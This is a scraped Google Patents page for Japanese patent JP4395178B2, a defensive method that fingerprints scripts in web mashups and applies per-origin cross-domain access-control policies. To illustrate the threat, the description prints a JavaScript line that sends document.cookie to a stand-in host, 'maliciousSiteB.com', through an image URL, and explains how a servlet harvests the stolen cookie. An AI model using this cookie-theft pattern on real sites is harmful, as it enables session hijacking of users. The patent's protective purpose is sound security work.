JP4395178B2 - コンテンツ処理システム、方法及びプログラム - Google Patents
コンテンツ処理システム、方法及びプログラム Download PDFInfo
- Publication number
- JP4395178B2 JP4395178B2 JP2007142191A JP2007142191A JP4395178B2 JP 4395178 B2 JP4395178 B2 JP 4395178B2 JP 2007142191 A JP2007142191 A JP 2007142191A JP 2007142191 A JP2007142191 A JP 2007142191A JP 4395178 B2 JP4395178 B2 JP 4395178B2
- Authority
- JP
- Japan
- Prior art keywords
- content
- script
- access control
- identification information
- mashup
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Expired - Fee Related
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/51—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems at application loading time, e.g. accepting, rejecting, starting or inhibiting executable software based on integrity or source reliability
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Computer Hardware Design (AREA)
- Physics & Mathematics (AREA)
- General Engineering & Computer Science (AREA)
- General Physics & Mathematics (AREA)
- Storage Device Security (AREA)
- Computer And Data Communications (AREA)
- Information Transfer Between Computers (AREA)
Description
2) マッシュアップアプリケーションでは、地図表示や検索エンジンなどの機能を実装したサービスとコンテンツを組み合わせて、新しいアプリケーションを生成する。複雑な機能をAPIとして提供することで、アプリケーションはサービス内部のプログラムのロジックを理解しなくても簡単に使うことができ、開発も容易となる。例えば、Google Mapから提供されるAPIを用いて近所の店などを紹介するページが簡単に作れる。また、広告用のプログラムをページに貼り付ければ、第三者のサイトの広告でビジネスを行なうこともある。
<img id="img1" src="http://www.siteA.com/img/product1.jpg">
var imgNode = document.getElementById("img1");
imgNode.src = http://www.maliciousSiteB.com/receiveData?data=" + document.cookie;
一方、www.maliciousSiteB.com側では、receiveDataはservletとして書かれており、このservletの最後のコード部分に、クッキー情報を取り出すコードが含まれている。次に、クッキーから取り出された情報を使って、本当のhttp://www.siteA.com/img/product1.jpgにrequestがredirectされる。こうして、もとの写真product1.jpgが書き換えられることになる。
例えば、http://www.server1.com/getMap.jsには以下のプログラムが含まれているとする。
function buildRequest(data) {
// buildRequest の中身
}
function sendData(request) {
// sendData の中身
}
var position = document.form1.position.value;
var request = buildRequest(position);
sendData(request);
このプログラムには、2つのfunction(関数)とinnerプログラムが含まれているため、次の3つの部分プログラムに分割できる。(分割されたそれぞれの単位は、かならず同時に実行される)
1) functionbuildRequest(){//buildRequestの中身}
2) functionsendData(){//sendDataの中身}
3) varposition=document.form1.position.values;varrequest=buildRequest(position);sendData(request);
フィンガープリントをセキュアハッシュ関数 (ここでは、SHA-1を用いるが、SHA-0、SHA-2など、その他の適当なハッシュ関数も使用することができる) により計算する場合、これらの部分プログラムに対しそれぞれハッシュ値を計算し、オリジンhttp://www.server1.com/getMap.jsと共にデータベース506に入れる。メソッドの場合、メソッド名も一緒に保存する。その内容を、下記の表に示す。
<img onLoad="document.getElementById('input2');...." src="..." >
このimg要素のonLoad部分に埋めたプログラムも外部サーバhttp://www.server2.com/specialEvent.jsから入力されたものとする。その場合、"document.getElementById(input2);..." というスクリプト文字列を正規化してしハッシュ値を取り、テーブルに保存する。
<meta name=URL:http://www.server1.com/getMap.js href="//*[@id='id1'] "/>
のように表現する。ここでは、hrefを用いてscriptタグの場所を表し、nameを用いてプログラムのオリジンを表す。更に、onClickやonLoadなどのイベント部のプログラムは
<meta name=" URL:http://www.server2.com/specialEvent.js" href="//*[@id='id2']/@onLoad"/>
のように表す。
また、JavaScriptの出ところをユーザからは隠蔽したい場合、name部分はURLではなく、別名を付ける方法も可能である。例えば、下記のようにする。
<meta name="nickname:S2" href="//*[@id='id2']/@onLoad" />
この二つの記述をポリシーとして、データベース506に保存する。
<rule object="XPath: //input[@type='password']" subject="URL:http://www.server2.com/*" action="*" permission="deny" />
となっている場合、別名に合わせて
<rule object="XPath: //input[@type='password']" subject="nickname:S2" action="*" permission="deny" />
に変更する。なお、このポリシーで、action="*"は、全てのアクションを指定することを意味する。
function BuildRequest(data) {
// BuildRequestの中身
}
function SendData(request) {
// BuildRequestの中身
}
var request = BuildRequest(position);
SendData(request);
</script>
<img onClick="document.getElementById("input2") ... "src="..." id="id2">
<h2>本日のニュース</h2>
<p>本日、東京都豊島区で、・・・・</p>
<style type="text/css">
h2 { color: white; background: lightgreen; }
body { background: white; margin-left: 2em; margin-right: 3em; }
</style>
<script type="text/javascript"
src="http://www.webmap.com/maps?file=api&v=1&key=given key">
</script>
<script type="text/javascript" id="script1">
//<![CDATA[
var map = new GraphicMap(document.getElementById("map"));
map.centerZoom(new MapPoint(118.0000, 47.0000), 4);
//]]>
</script>
document.GetElementById("IMG").width = 30;
document.GetElementById("IMG").setAttribute("align","right");
<form>
<input type="button" value="Red" onClick="ChangeBgColor('yellow','red')"><br>
<input type="button" value="Blue" onClick="ChangeBgColor('white','blue')"><br>
</form>
あるいは、下記のようなコードも含まれ得る。Function1()は、なんらかのイメージ・ファイルの内容を返すものとする。
<img src="Function1()" width="20" height="30">
<accessControlPolicy>
<rule object="entireDomain" subject="www.webmap.com" action="read"
permission="allow" />
<meta name=”nickname:S1” href=”//*[@id=’script1’]” />
<rule object=”entireDomain” subject=”nickname:S1” action=”read, write”
permission=”allow” />
</accessControlPolicy>
具体例でみると、第1と第3の式は、DOMノードに直接アクセスするので、センシティブであると判断される。一方、第2の式は、単に変数に値を代入するだけなので、センシティブであるとは見なされない。
var node = document.getElementById("xxx"); // センシティブ
var msg = "hello," + " world."; // センシティブではない
node.innerHTML = msg; // センシティブ
1.先ず、最初に行うのは、データやプログラムにドメインを定義することである。
もし、データやプログラムに署名がなされていれば、署名をもちいて、ドメイン(署名者)が決まる。
データやプログラムが署名されていないとき、URLを用いてドメイン(URL)が決まる。
ウェブページの作成者または管理者は、同じ署名部分または外部にとって同じURLとなる部分的なコンテンツに対し、メタデータで更に細かいドメインを定義し、その部分のデータまたはプログラムのドメイン(meta)が決まる。
ドメイン定義は局所優先ポリシーで一意に決まる。
2.あるドメインのプログラムが別ドメインにあるデータにアクセスするとき、クロスドメインアクセスが発生する。
3.各ドメインの管理者は自分のデータへのクロスドメインアクセスについて可否を定義するアクセス制御ポリシーを定義し、ウェブページが要求されるとき、アクセス制御ポリシーも一緒にクライアント側に渡す。
4.クロスドメインアクセスが発生するとき、アクセスされる側にアクセス制御ポリシーが定義されていれば、ポリシーに従って外部からのクロスドメインアクセスの可否が決まる。
5,クロスドメインが発生するとき、アクセス制御ポリシーが定義されていなければ、デフォルトのポリシー(例えば、外部からのクロスドメインアクセスを許さない)が適用される。
6.データとプログラムに関したクロスドメインアクセス制御ポリシーは、ルールのリストからなる。一つのルールはobject, subject, action, permissionと四つの要素を持つ。
このとき、Objectとは、アクセスされる対象であり、ドキュメントのオブジェクト、または、DOMノード及び特定のDOMノードを基点とする部分的なコンテンツ(DOMのサブツリー)、ウェブページのHTMLオブジェクト(cookie, title, URLなどDOMツリーに生成されないオブジェクトである)。
Subjectとは、クロスドメインアクセスを行なう主体となるプログラムのドメイン。ドメインは署名(signer)に基づくか、URLに基づくか、またはメタデータ基づくかをPrefix(URLまたはnickname)として指定する。正規表現による指定が可能である。
Actionとは、read, write, create, delete のようなアクセス種別。"*"と指定したとき、全てのアクションが対象となる。
Permissionとは、Allow or Denyのようなアクセス可否である。
したがって、アクセス制御ポリシーの意味は“The action from the subject to the object is allowed or denied.”(subjectからobjectへの動作は、許可されるか、拒否されるかのどちらか)となる。
7. クロスドメインアクセス制御ポリシーのobjectの指定方法について、
entireDomainで指定:ドメインに属するDOMノード全体とウェブページのHTMLオブジェクトが対象となる。
XPath://input[@type="password"]のようなXPath:式で指定する:ドメイン内XPathに選択されるDOMノードが対象となる。
HTMLObject:cookieのようなHTMLObject:オブジェクト名で指定する:ウェブページのHTMLオブジェクトが対象となる。"*"と指定したとき、全てのHTMLオブジェクトが対象となる。
アクセス制御ポリシーは局所優先ポリシーで決まる。つまり、DOMノードに関したアクセス制御ポリシーはドメインに関したアクセス制御ポリシーより優先する。
<accessControlPolicy>
<meta name="nickname:S1" href="//*[@id='id1']" />
<meta name="nickname:S2" href="//*[@id='id2']/@onLoad" />
<rule object="entireDomain" subject="nickname:S1" action="read, write" permission="allow" />
<rule object="XPath: //input[@type='password']" subject="nickname:S2" action="*" permission="deny" />
</accessControlPolicy>
<accessControlPolicy>
<meta name="nickname:S1" href="//*[@id='id1']" />
<meta name="nickname:S2" href="//*[@id='id2']/@onLoad" />
<rule object="entireDomain" subject="nickname:S1" action="read, write" permission="allow" />
<rule object="XPath: //input[@type='password']" subject="nickname:S2" action="*" permission="deny" />
</accessControlPolicy>
Claims (17)
- インターネットを介して、ウェブ・サービスから受領したコンテンツを処理する方法であって、
コンピュータの処理によって、複数のウェブ・サービスから、コンテンツを受領するステップと、
ウェブ・サービスから送られてくるポリシーまたは、管理者が設定したポリシーを保存することにより、オリジン情報毎のポリシーを記録したデータベースを用意するステップと、
コンピュータの処理によって、前記コンテンツのスクリプト部分を正規化し、該正規化したスクリプト部分の識別情報を計算するステップと、
コンピュータの処理によって、前記コンテンツのオリジン情報を取得するステップと、
コンピュータの処理によって、前記識別情報を、前記オリジン情報に関連付けて、記憶手段に格納するステップと、
ユーザーの指定に基づき、コンピュータの処理によって、前記複数のウェブ・サービスからの前記コンテンツを組み合わせて、マッシュアップ・コンテンツを生成するステップと、
コンピュータの処理によって、前記生成されたマッシュアップ・コンテンツのスクリプト部分の識別情報を計算し、該計算された識別情報に関連付けられたオリジン情報を、前記記憶手段から突き止めるステップと、
コンピュータの処理によって、前記突き止められたオリジン情報に基づき前記データベースを参照して、前記コンテンツの前記スクリプト部分のアクセス権限を指定するアクセス制御ポリシーを生成するステップを有する、
コンテンツの処理方法。 - 前記スクリプトが、JavaScriptである、請求項1に記載の方法。
- 前記識別情報が、前記スクリプト部分のハッシュ関数の値として計算される、請求項1に記載の方法。
- 前記スクリプト部分の各々のメソッドに、前記マッシュアップ・コンテンツ内で一意的なidを付与するステップを有する、請求項2に記載の方法。
- 前記アクセス制御ポリシーは、前記idに関連付けて設定される、請求項4に記載の方法。
- 前記マッシュアップ・コンテンツにおいて、前記複数のウェブ・サービスのコンテンツに含まれるスクリプトのメソッド名が重複しないように、該メソッド名を書き換えるステップを有する、請求項5に記載の方法。
- インターネットを介して、複数のウェブ・サービスから受領したコンテンツを処理するシステムであって、
ウェブ・サービスから、コンテンツを受領する手段と、
ウェブ・サービスから送られてくるポリシーまたは、管理者が設定したポリシーを保存することにより、オリジン情報毎のポリシーを記録したデータベースと、
前記コンテンツのスクリプト部分を正規化し、該正規化したスクリプト部分の識別情報を計算する手段と、
前記コンテンツのオリジン情報を取得する手段と、
データを読み取り可能に保持する記憶手段と、
前記識別情報を、前記オリジン情報に関連付けて、記憶手段に格納する手段と、
ユーザーの指定に基づき、前記複数のウェブ・サービスからの前記コンテンツを組み合わせて、マッシュアップ・コンテンツを生成する手段と、
前記生成されたマッシュアップ・コンテンツのスクリプト部分の識別情報を計算し、該計算された識別情報に関連付けられたオリジン情報を、前記記憶手段から突き止める手段と、
前記突き止められたオリジン情報に基づき前記データベースを参照して、前記コンテンツの前記スクリプト部分のアクセス権限を指定するアクセス制御ポリシーを生成する手段を有する、
コンテンツの処理システム。 - 前記スクリプトが、JavaScriptである、請求項7に記載のシステム。
- 前記識別情報が、前記スクリプト部分のハッシュ関数の値として計算される、請求項7に記載のシステム。
- 前記マッシュアップ・コンテンツと、前記アクセス制御ポリシーとを受領する手段と、
前記マッシュアップ・コンテンツ内のスクリプト部分を実行する手段と、
該スクリプト部分にセンシティブな部分があったことに応答して、前記アクセス制御ポリシーを参照し、前記アクセス制御ポリシーに実行許可が記述されていることに応答して、実行を許可する手段、とをさらに有する、
請求項7に記載のシステム。 - 前記センシティブな部分と判断される部分は、DOMに関連するコードを含むものである、請求項10に記載のシステム。
- コンピュータの処理によって、インターネットを介して、ウェブ・サービスから受領したコンテンツを処理するプログラムであって、
前記コンピュータをして、
ウェブ・サービスから、コンテンツを受領するステップと、
ウェブ・サービスから送られてくるポリシーまたは、管理者が設定したポリシーを保存することにより、オリジン情報毎のポリシーを記録したデータベースを用意するステップと、
前記コンテンツのスクリプト部分を正規化し、該正規化したスクリプト部分の識別情報を計算するステップと、
前記コンテンツのオリジン情報を取得するステップと、
前記識別情報を、前記オリジン情報に関連付けて、記憶手段に格納するステップと、
コンピュータの処理によって、ユーザーの指定に基づき、前記複数のウェブ・サービスからの前記コンテンツを組み合わせて、マッシュアップ・コンテンツを生成するステップと、
前記生成されたマッシュアップ・コンテンツのスクリプト部分の識別情報を計算し、該計算された識別情報に関連付けられたオリジン情報を、前記記憶手段から突き止めるステップと、
前記突き止められたオリジン情報に基づき前記データベースを参照して、前記コンテンツの前記スクリプト部分のアクセス権限を指定するアクセス制御ポリシーを生成するステップを実行させる、
コンテンツの処理プログラム。 - 前記スクリプトが、JavaScriptである、請求項12に記載のプログラム。
- 前記識別情報が、前記スクリプト部分のハッシュ関数の値として計算される、請求項12に記載のプログラム。
- 前記各々のメソッドに、前記マッシュアップ・コンテンツ内で一意的なidを付与するステップを有する、請求項12に記載のプログラム。
- 前記アクセス制御ポリシーは、前記idに関連付けて設定される、請求項15に記載のプログラム。
- 前記マッシュアップ・コンテンツにおいて、前記複数のウェブ・サービスのコンテンツに含まれるスクリプトのメソッド名が重複しないように、該メソッド名を書き換えるステップを有する、請求項16に記載のプログラム。
Priority Applications (2)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
JP2007142191A JP4395178B2 (ja) | 2007-05-29 | 2007-05-29 | コンテンツ処理システム、方法及びプログラム |
US12/128,692 US20080301766A1 (en) | 2007-05-29 | 2008-05-29 | Content processing system, method and program |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
JP2007142191A JP4395178B2 (ja) | 2007-05-29 | 2007-05-29 | コンテンツ処理システム、方法及びプログラム |
Publications (2)
Publication Number | Publication Date |
---|---|
JP2008299414A JP2008299414A (ja) | 2008-12-11 |
JP4395178B2 true JP4395178B2 (ja) | 2010-01-06 |
Family
ID=40089822
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
JP2007142191A Expired - Fee Related JP4395178B2 (ja) | 2007-05-29 | 2007-05-29 | コンテンツ処理システム、方法及びプログラム |
Country Status (2)
Country | Link |
---|---|
US (1) | US20080301766A1 (ja) |
JP (1) | JP4395178B2 (ja) |
Families Citing this family (48)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US7757282B2 (en) * | 2005-05-20 | 2010-07-13 | Microsoft Corporation | System and method for distinguishing safe and potentially unsafe data during runtime processing |
US8850544B1 (en) * | 2008-04-23 | 2014-09-30 | Ravi Ganesan | User centered privacy built on MashSSL |
US20090328137A1 (en) * | 2008-06-30 | 2009-12-31 | Wen-Tien Liang | Method for protecting data in mashup websites |
US8931084B1 (en) * | 2008-09-11 | 2015-01-06 | Google Inc. | Methods and systems for scripting defense |
US20100180330A1 (en) * | 2009-01-09 | 2010-07-15 | Microsoft Corporation | Securing Communications for Web Mashups |
US8272065B2 (en) * | 2009-03-11 | 2012-09-18 | Telefonaktiebolaget Lm Ericsson (Publ) | Secure client-side aggregation of web applications |
JP5159711B2 (ja) * | 2009-06-25 | 2013-03-13 | インターナショナル・ビジネス・マシーンズ・コーポレーション | 組込み機器およびその状態表示制御方法 |
WO2011027492A1 (ja) * | 2009-09-04 | 2011-03-10 | パナソニック株式会社 | クライアント端末、サーバ、サーバクライアントシステム、連携動作処理方法、プログラム、および記録媒体 |
US20110066563A1 (en) * | 2009-09-11 | 2011-03-17 | Lalita Jagadeesan | Mashup sevices and methods with quality of sevice (QoS) support |
US20110137909A1 (en) * | 2009-12-07 | 2011-06-09 | Sap Ag | Location independent execution of user interface operations |
US10102301B2 (en) | 2010-04-01 | 2018-10-16 | Cloudflare, Inc. | Internet-based proxy security services |
US9049247B2 (en) | 2010-04-01 | 2015-06-02 | Cloudfare, Inc. | Internet-based proxy service for responding to server offline errors |
CN102238203A (zh) | 2010-04-23 | 2011-11-09 | 中兴通讯股份有限公司 | 一种实现物联网业务的方法及系统 |
JP2011253474A (ja) * | 2010-06-04 | 2011-12-15 | Canon Inc | ユーザ装置特定方法および情報処理システム |
JP5682181B2 (ja) * | 2010-08-25 | 2015-03-11 | 日本電気株式会社 | 通信制御機能を有する通信装置、方法、プログラム |
US20120185911A1 (en) * | 2010-09-30 | 2012-07-19 | Khandys Polite | Mlweb: a multilevel web application framework |
US8990950B2 (en) * | 2010-12-27 | 2015-03-24 | International Business Machines Corporation | Enabling granular discretionary access control for data stored in a cloud computing environment |
US8285808B1 (en) * | 2011-05-20 | 2012-10-09 | Cloudflare, Inc. | Loading of web resources |
US10445528B2 (en) * | 2011-09-07 | 2019-10-15 | Microsoft Technology Licensing, Llc | Content handling for applications |
JP2013065114A (ja) * | 2011-09-15 | 2013-04-11 | Fujitsu Ltd | 情報処理システムの制御方法、中継装置の制御プログラム及びクライアント装置の制御プログラム |
US8898780B2 (en) * | 2011-11-07 | 2014-11-25 | Qualcomm Incorporated | Encoding labels in values to capture information flows |
CN103139260B (zh) | 2011-11-30 | 2015-09-30 | 国际商业机器公司 | 用于重用html内容的方法和系统 |
GB2492857B (en) | 2011-11-30 | 2013-07-17 | Avecto Ltd | Method and computer device to control software file downloads |
GB201205117D0 (en) | 2012-03-23 | 2012-05-09 | Saasid Ltd | Dynamic rendering of a document object model |
GB2503070B (en) * | 2012-03-23 | 2015-01-21 | Saasid Ltd | Dynamic rendering of a document object model |
GB2505730B (en) * | 2012-11-30 | 2014-10-15 | Openwave Mobility Inc | A method, apparatus and computer program for controlling access to content in a communications network |
US11650814B1 (en) * | 2012-12-21 | 2023-05-16 | EMC IP Holding Company LLC | Generating customized documentation for applications |
CN103023790A (zh) * | 2012-12-31 | 2013-04-03 | 北京京东世纪贸易有限公司 | 一种用于实现跨域交互访问的方法和系统 |
WO2015013459A1 (en) * | 2013-07-26 | 2015-01-29 | Ad-Vantage Networks, Inc. | Systems and methods for managing network resource requests |
JP6131817B2 (ja) | 2013-10-08 | 2017-05-24 | 富士通株式会社 | 通信端末、通信処理方法および通信処理プログラム |
CN103778193A (zh) * | 2014-01-06 | 2014-05-07 | 北京星网锐捷网络技术有限公司 | 一种提高网页显示速度的方法及浏览器 |
US10318732B2 (en) * | 2014-09-18 | 2019-06-11 | Trend Micro Incorporated | Prevention of cross site scripting attacks using automatic generation of content security policy headers and splitting of content to enable content security policy |
US11070608B2 (en) * | 2015-06-17 | 2021-07-20 | Fastly, Inc. | Expedited sub-resource loading |
US10530739B2 (en) * | 2015-10-20 | 2020-01-07 | Samsung Electronics Co., Ltd. | Method and apparatus for address resolution of multicast/broadcast resources using domain name systems |
CN105635126B (zh) * | 2015-12-24 | 2018-10-09 | 北京奇虎科技有限公司 | 恶意网址访问防护方法、客户端、安全服务器及系统 |
KR101717564B1 (ko) * | 2016-03-21 | 2017-03-20 | 서울여자대학교 산학협력단 | 웹사이트 개발 및 평가를 위한 웹-인-더-루프 시뮬레이션 장치 및 방법 |
US10997557B2 (en) | 2016-10-14 | 2021-05-04 | Slack Technologies, Inc. | Method, apparatus, and computer program product for authorizing and authenticating user communication within an enterprise group-based communication platform |
US9940394B1 (en) * | 2016-10-14 | 2018-04-10 | Slack Technologies, Inc. | Messaging search and management apparatuses, methods and systems |
US11595327B2 (en) | 2016-10-14 | 2023-02-28 | Salesforce, Inc. | Method, apparatus, and computer program product for associating an identifier with one or more message communications within a group-based communication system |
US10129258B2 (en) * | 2016-11-30 | 2018-11-13 | Salesforce.Com, Inc. | Secure component-based web applications |
US10116660B2 (en) | 2016-11-30 | 2018-10-30 | Salesforce.Com, Inc. | Security modes for a component-based web security model |
CN107222580A (zh) * | 2017-07-28 | 2017-09-29 | 郑州云海信息技术有限公司 | 一种利用图片实现跨域传递数据的方法 |
US10594720B2 (en) * | 2017-11-03 | 2020-03-17 | International Business Machines Corporation | Exercising security control point (SCP) capabilities on live systems based on internal validation processing |
EP3621266B1 (de) * | 2018-09-05 | 2021-07-28 | Siemens Aktiengesellschaft | Verfahren zum betrieb eines webservers |
US11188622B2 (en) * | 2018-09-28 | 2021-11-30 | Daniel Chien | Systems and methods for computer security |
US10346378B1 (en) | 2018-11-30 | 2019-07-09 | Slack Technologies, Inc. | Data storage architecture for an enterprise communication system |
US11258800B2 (en) * | 2019-06-28 | 2022-02-22 | Slack Technologies, Llc | Managing admin controlled access of external resources to group-based communication interfaces via a group-based communication system |
CN111104097B (zh) * | 2019-12-13 | 2023-06-30 | 上海众源网络有限公司 | 一种数据写入、读取方法及装置 |
Family Cites Families (4)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US6167520A (en) * | 1996-11-08 | 2000-12-26 | Finjan Software, Inc. | System and method for protecting a client during runtime from hostile downloadables |
US7975305B2 (en) * | 1997-11-06 | 2011-07-05 | Finjan, Inc. | Method and system for adaptive rule-based content scanners for desktop computers |
US6505300B2 (en) * | 1998-06-12 | 2003-01-07 | Microsoft Corporation | Method and system for secure running of untrusted content |
US20080222237A1 (en) * | 2007-03-06 | 2008-09-11 | Microsoft Corporation | Web services mashup component wrappers |
-
2007
- 2007-05-29 JP JP2007142191A patent/JP4395178B2/ja not_active Expired - Fee Related
-
2008
- 2008-05-29 US US12/128,692 patent/US20080301766A1/en not_active Abandoned
Also Published As
Publication number | Publication date |
---|---|
JP2008299414A (ja) | 2008-12-11 |
US20080301766A1 (en) | 2008-12-04 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
JP4395178B2 (ja) | コンテンツ処理システム、方法及びプログラム | |
US10164993B2 (en) | Distributed split browser content inspection and analysis | |
US8464318B1 (en) | System and method for protecting web clients and web-based applications | |
US10678910B2 (en) | Modifying web page code to include code to protect output | |
US8856874B2 (en) | Method and apparatus for serving content elements of a markup language document protected against cross-site scripting attack | |
US8826411B2 (en) | Client-side extensions for use in connection with HTTP proxy policy enforcement | |
US9223987B2 (en) | Confidential information identifying method, information processing apparatus, and program | |
US9160756B2 (en) | Method and apparatus for protecting markup language document against cross-site scripting attack | |
US20100186089A1 (en) | Method and system for protecting cross-domain interaction of a web application on an unmodified browser | |
US20160012213A1 (en) | Methods and systems for verifying the security level of web content that is embedded within a mobile application and the identity of web application owners field of the disclosure | |
US10474729B2 (en) | Delayed encoding of resource identifiers | |
CN112703496B (zh) | 关于恶意浏览器插件对应用用户的基于内容策略的通知 | |
US20100306184A1 (en) | Method and device for processing webpage data | |
EP2642718B1 (en) | Dynamic rendering of a document object model | |
US20140283078A1 (en) | Scanning and filtering of hosted content | |
Yang et al. | Toward principled browser security | |
US11314834B2 (en) | Delayed encoding of resource identifiers | |
US10263992B2 (en) | Method for providing browser using browser processes separated for respective access privileges and apparatus using the same | |
Bui et al. | Xss vulnerabilities in cloud-application add-ons | |
Zhou et al. | Protecting private web content from embedded scripts | |
JP5682181B2 (ja) | 通信制御機能を有する通信装置、方法、プログラム | |
JP2005339008A (ja) | アクセス制御方法およびプログラムと記録媒体 | |
JP6884652B2 (ja) | ホワイトリスト管理システムおよびホワイトリスト管理方法 | |
US20160378982A1 (en) | Local environment protection method and protection system of terminal responding to malicious code in link information | |
KR101305755B1 (ko) | 주소에 기반하여 스크립트 실행을 필터링하는 장치 및 방법 |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
A621 | Written request for application examination |
Free format text: JAPANESE INTERMEDIATE CODE: A621 Effective date: 20090522 |
|
A871 | Explanation of circumstances concerning accelerated examination |
Free format text: JAPANESE INTERMEDIATE CODE: A871 Effective date: 20090522 |
|
A975 | Report on accelerated examination |
Free format text: JAPANESE INTERMEDIATE CODE: A971005 Effective date: 20090616 |
|
A131 | Notification of reasons for refusal |
Free format text: JAPANESE INTERMEDIATE CODE: A131 Effective date: 20090623 |
|
A521 | Request for written amendment filed |
Free format text: JAPANESE INTERMEDIATE CODE: A523 Effective date: 20090907 |
|
TRDD | Decision of grant or rejection written | ||
A01 | Written decision to grant a patent or to grant a registration (utility model) |
Free format text: JAPANESE INTERMEDIATE CODE: A01 Effective date: 20091006 |
|
A01 | Written decision to grant a patent or to grant a registration (utility model) |
Free format text: JAPANESE INTERMEDIATE CODE: A01 |
|
A61 | First payment of annual fees (during grant procedure) |
Free format text: JAPANESE INTERMEDIATE CODE: A61 Effective date: 20091016 |
|
R150 | Certificate of patent or registration of utility model |
Free format text: JAPANESE INTERMEDIATE CODE: R150 |
|
FPAY | Renewal fee payment (event date is renewal date of database) |
Free format text: PAYMENT UNTIL: 20121023 Year of fee payment: 3 |
|
FPAY | Renewal fee payment (event date is renewal date of database) |
Free format text: PAYMENT UNTIL: 20121023 Year of fee payment: 3 |
|
FPAY | Renewal fee payment (event date is renewal date of database) |
Free format text: PAYMENT UNTIL: 20131023 Year of fee payment: 4 |
|
LAPS | Cancellation because of no payment of annual fees |